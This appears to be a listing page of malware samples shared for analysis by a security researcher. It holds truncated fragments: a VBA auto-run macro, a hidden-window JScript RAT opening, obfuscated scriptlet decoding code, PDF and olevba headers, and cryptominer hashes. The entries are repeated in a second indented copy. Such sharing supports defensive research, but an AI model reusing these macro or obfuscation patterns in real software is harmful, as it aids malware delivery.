John Lambert JohnLaTwC

## FileAssocSet
Sub AutoOpen()
    Call FileTypeSet
End Sub
Sub AutoClose()
    Call FileTypeReset
End Sub
Sub FileTypeReset()
    Dim g_szAsocArray: g_szAsocArray = Array("JSEFile", "JSFile", "VBEFile", "VBSFile", "WSHFile", "WSFFile")
    Dim oWSH
    Dim szExt

## 588cd0fe3ae6fbd2fa4cf8de8db8ae2069ea62c9eaa6854caedf45045780661f
## uploaded by @JohnLaTwC
## sample hash: 588cd0fe3ae6fbd2fa4cf8de8db8ae2069ea62c9eaa6854caedf45045780661f

olevba 0.52dev7 - http://decalage.info/python/oletools
Flags        Filename
-----------  -----------------------------------------------------------------
OLE:MASI-B-- 588cd0fe3ae6fbd2fa4cf8de8db8ae2069ea62c9eaa6854caedf45045780661f
===============================================================================
FILE: 588cd0fe3ae6fbd2fa4cf8de8db8ae2069ea62c9eaa6854caedf45045780661f
Type: OLE

## malware.txt
## uploaded by @JohnLaTwC
## sample hash: 50cde418da81fd42da8b8bb603aaebc30620e53a8b0c4e615a9dc09efc8bc728
olevba 0.52dev7 - http://decalage.info/python/oletools
Flags        Filename
-----------  -----------------------------------------------------------------
MHT:MASIHB-- 50cde418da81fd42da8b8bb603aaebc30620e53a8b0c4e615a9dc09efc8bc728
===============================================================================
FILE: 50cde418da81fd42da8b8bb603aaebc30620e53a8b0c4e615a9dc09efc8bc728
Type: MHTML
-------------------------------------------------------------------------------

## JavaScript RAT
## uploaded by @JohnLaTwC
## sample hash: 1d37e2a657ccc595c7a5544df6fd2d35739455f3fdbc2d2700835873130befde
<html>
<head>
<script language="JScript">
window.resizeTo(1, 1);
window.moveTo(-2000, -2000);
window.blur();

try

## Daily Scriptlet Decoded
## uploaded by @JohnLaTwC
## sample hash: 50685a379e6bd8f24956170ee1bb0b6a86c37db2112946c208d71f4a76a6ec3f
<!--774E5519EACB8982F86034AD06816217FDA1E5D3AFDE3E94BB5B69C95C34F71B1113CC4A1B2E97F458FD598F9682E44DA63A8C98F32C9A43AF4F9452110B4207--><package >
<component id="afgwwZzDmK9fxaJdvFovs8GYLrqj" >
<registration
progid="obLrn.U3rY5s"
classid="{783B20D9-521E-9B68-FF17-33FF120E86D6}" >
<script language="JScript" >
function iZjDo3k(jfi2VxX){var rJK4Qm = "";var h8Oy = 0;for (h8Oy = jfi2VxX.length - 1; h8Oy >= 0; h8Oy -= 1){rJK4Qm += jfi2VxX.charAt(h8Oy);}return rJK4Qm;}function yZY8ddf(kJYu) {var q2XJc = "r";var kKfG = "C";var fu = [];var keFQz9Vbm2 = "o";fu[0] = "f" + q2XJc + keFQz9Vbm2 + "m";fu[1] = kKfG + "ha";fu[2] = q2XJc + kKfG;fu[3] = keFQz9Vbm2 + "de";var dmDU5P = fu[0] + fu[1] + fu[2] + fu[3];var mmeF5Ap = String;return mmeF5Ap[dmDU5P](kJYu);}function xP035QGgN(ag){return "+" ==ag?62:"/"==ag?63:vm27C7HmF.indexOf(ag);}function ph6T0AN(fIImISnUlb){var vpq8QW3uBI;var mRIs;var xYYT7RMqs;var hQtefhUl;var tgHA

## Macro-Doc-Scriptlet-Ps1 threat
## uploaded by @JohnLaTwC
## Sample hash: 8ec12b0d45c71d87fd78cd69ff01d925f7729621f4172d2326cc238730c8d531
olevba 0.52dev7 - http://decalage.info/python/oletools
Flags        Filename
-----------  -----------------------------------------------------------------
OLE:MASI---- 8ec12b0d45c71d87fd78cd69ff01d925f7729621f4172d2326cc238730c8d531
===============================================================================
FILE: 8ec12b0d45c71d87fd78cd69ff01d925f7729621f4172d2326cc238730c8d531
Type: OLE
-------------------------------------------------------------------------------

## PDF JS threat
## Uploaded by @JohnLaTwC
## Sample hash: 55492b266527027fc3fcf9a915e53b2552efe1f51f67f2d2dc356b564df106fc

%PDF-1.1

1 0 obj
<<
 /Type /Catalog
 /Outlines 2 0 R
 /Pages 3 0 R

## cryptonight WASM miner
## uploaded by @JohnLaTwC
## sample hash: 001f32784020c51a37d0805894c206ad3af6f64982920f2e5d9fa4ecd2a7f295
## 0080ac8f345ffa6efd580c32f256179bc84d461c7ed0ae8b12840435232cc301
## 008a4edf85ff8f048dec06d60ace786148eb9f7d59154967c0f788672d55a81f
## 0237d082feaa02a12e15cace26c4f82da1c477ef771d932eee5adc6ce9752ec4
## 06f04642cb950f9aef4ead17e1133aa5fbb13ec99ce3e3bf4bb0b8cdd0c36248
## 08ec5e976ef01e43f1ae4f135ea8eb6840b206c74d1240b626e2944feaff86db
## 096fc6c469d3c1e85fcdfbd889441a519e1070f638187804f3c4032495e502d0
## 0a993356554333779fc3dbca6b87cfa327efa4d931205c8c00f32381bdf9bcff
## 0bd10a6fa8c53bda71d7cd892479166e497ee649f4a4c4f27a93b7a4aaff6edd

## 606b4bd217b980ce70e4986511fcd00f43e7a89e9e2c6a51ea90d6f3faf33ac9.sct
## uploaded by @JohnLaTwC
## Sample hash: 606b4bd217b980ce70e4986511fcd00f43e7a89e9e2c6a51ea90d6f3faf33ac9
<?XML version="1.0"?>
<scriptlet>
<registration
	progid="PoC"
	classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<!--  License: BSD3-Clause -->
	<script language="JScript">

## 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75.txt
## uploaded by @JohnLaTwC
## Sample hash: 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75
olevba 0.52dev7 - http://decalage.info/python/oletools
Flags        Filename
-----------  -----------------------------------------------------------------
OLE:MAS-HB-- 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75
===============================================================================
FILE: 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75
Type: OLE
-------------------------------------------------------------------------------
	Sub AutoOpen()
	Call FileTypeSet
	End Sub
	Sub AutoClose()
	Call FileTypeReset
	End Sub
	Sub FileTypeReset()
	Dim g_szAsocArray: g_szAsocArray = Array("JSEFile", "JSFile", "VBEFile", "VBSFile", "WSHFile", "WSFFile")
	Dim oWSH
	Dim szExt
	## uploaded by @JohnLaTwC
	## sample hash: 588cd0fe3ae6fbd2fa4cf8de8db8ae2069ea62c9eaa6854caedf45045780661f

	olevba 0.52dev7 - http://decalage.info/python/oletools
	Flags Filename
	----------- -----------------------------------------------------------------
	OLE:MASI-B-- 588cd0fe3ae6fbd2fa4cf8de8db8ae2069ea62c9eaa6854caedf45045780661f
	===============================================================================
	FILE: 588cd0fe3ae6fbd2fa4cf8de8db8ae2069ea62c9eaa6854caedf45045780661f
	Type: OLE
	## uploaded by @JohnLaTwC
	## sample hash: 50cde418da81fd42da8b8bb603aaebc30620e53a8b0c4e615a9dc09efc8bc728
	olevba 0.52dev7 - http://decalage.info/python/oletools
	Flags Filename
	----------- -----------------------------------------------------------------
	MHT:MASIHB-- 50cde418da81fd42da8b8bb603aaebc30620e53a8b0c4e615a9dc09efc8bc728
	===============================================================================
	FILE: 50cde418da81fd42da8b8bb603aaebc30620e53a8b0c4e615a9dc09efc8bc728
	Type: MHTML
	-------------------------------------------------------------------------------
	## uploaded by @JohnLaTwC
	## sample hash: 1d37e2a657ccc595c7a5544df6fd2d35739455f3fdbc2d2700835873130befde
	<html>
	<head>
	<script language="JScript">
	window.resizeTo(1, 1);
	window.moveTo(-2000, -2000);
	window.blur();

	try
	## uploaded by @JohnLaTwC
	## sample hash: 50685a379e6bd8f24956170ee1bb0b6a86c37db2112946c208d71f4a76a6ec3f
	<!--774E5519EACB8982F86034AD06816217FDA1E5D3AFDE3E94BB5B69C95C34F71B1113CC4A1B2E97F458FD598F9682E44DA63A8C98F32C9A43AF4F9452110B4207--><package >
	<component id="afgwwZzDmK9fxaJdvFovs8GYLrqj" >
	<registration
	progid="obLrn.U3rY5s"
	classid="{783B20D9-521E-9B68-FF17-33FF120E86D6}" >
	<script language="JScript" >
	function iZjDo3k(jfi2VxX){var rJK4Qm = "";var h8Oy = 0;for (h8Oy = jfi2VxX.length - 1; h8Oy >= 0; h8Oy -= 1){rJK4Qm += jfi2VxX.charAt(h8Oy);}return rJK4Qm;}function yZY8ddf(kJYu) {var q2XJc = "r";var kKfG = "C";var fu = [];var keFQz9Vbm2 = "o";fu[0] = "f" + q2XJc + keFQz9Vbm2 + "m";fu[1] = kKfG + "ha";fu[2] = q2XJc + kKfG;fu[3] = keFQz9Vbm2 + "de";var dmDU5P = fu[0] + fu[1] + fu[2] + fu[3];var mmeF5Ap = String;return mmeF5Ap[dmDU5P](kJYu);}function xP035QGgN(ag){return "+" ==ag?62:"/"==ag?63:vm27C7HmF.indexOf(ag);}function ph6T0AN(fIImISnUlb){var vpq8QW3uBI;var mRIs;var xYYT7RMqs;var hQtefhUl;var tgHA
	## uploaded by @JohnLaTwC
	## Sample hash: 8ec12b0d45c71d87fd78cd69ff01d925f7729621f4172d2326cc238730c8d531
	olevba 0.52dev7 - http://decalage.info/python/oletools
	Flags Filename
	----------- -----------------------------------------------------------------
	OLE:MASI---- 8ec12b0d45c71d87fd78cd69ff01d925f7729621f4172d2326cc238730c8d531
	===============================================================================
	FILE: 8ec12b0d45c71d87fd78cd69ff01d925f7729621f4172d2326cc238730c8d531
	Type: OLE
	-------------------------------------------------------------------------------
	## Uploaded by @JohnLaTwC
	## Sample hash: 55492b266527027fc3fcf9a915e53b2552efe1f51f67f2d2dc356b564df106fc

	%PDF-1.1

	1 0 obj
	<<
	/Type /Catalog
	/Outlines 2 0 R
	/Pages 3 0 R
	## uploaded by @JohnLaTwC
	## sample hash: 001f32784020c51a37d0805894c206ad3af6f64982920f2e5d9fa4ecd2a7f295
	## 0080ac8f345ffa6efd580c32f256179bc84d461c7ed0ae8b12840435232cc301
	## 008a4edf85ff8f048dec06d60ace786148eb9f7d59154967c0f788672d55a81f
	## 0237d082feaa02a12e15cace26c4f82da1c477ef771d932eee5adc6ce9752ec4
	## 06f04642cb950f9aef4ead17e1133aa5fbb13ec99ce3e3bf4bb0b8cdd0c36248
	## 08ec5e976ef01e43f1ae4f135ea8eb6840b206c74d1240b626e2944feaff86db
	## 096fc6c469d3c1e85fcdfbd889441a519e1070f638187804f3c4032495e502d0
	## 0a993356554333779fc3dbca6b87cfa327efa4d931205c8c00f32381bdf9bcff
	## 0bd10a6fa8c53bda71d7cd892479166e497ee649f4a4c4f27a93b7a4aaff6edd
	## uploaded by @JohnLaTwC
	## Sample hash: 606b4bd217b980ce70e4986511fcd00f43e7a89e9e2c6a51ea90d6f3faf33ac9
	<?XML version="1.0"?>
	<scriptlet>
	<registration
	progid="PoC"
	classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<!-- License: BSD3-Clause -->
	<script language="JScript">
	## uploaded by @JohnLaTwC
	## Sample hash: 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75
	olevba 0.52dev7 - http://decalage.info/python/oletools
	Flags Filename
	----------- -----------------------------------------------------------------
	OLE:MAS-HB-- 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75
	===============================================================================
	FILE: 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75
	Type: OLE
	-------------------------------------------------------------------------------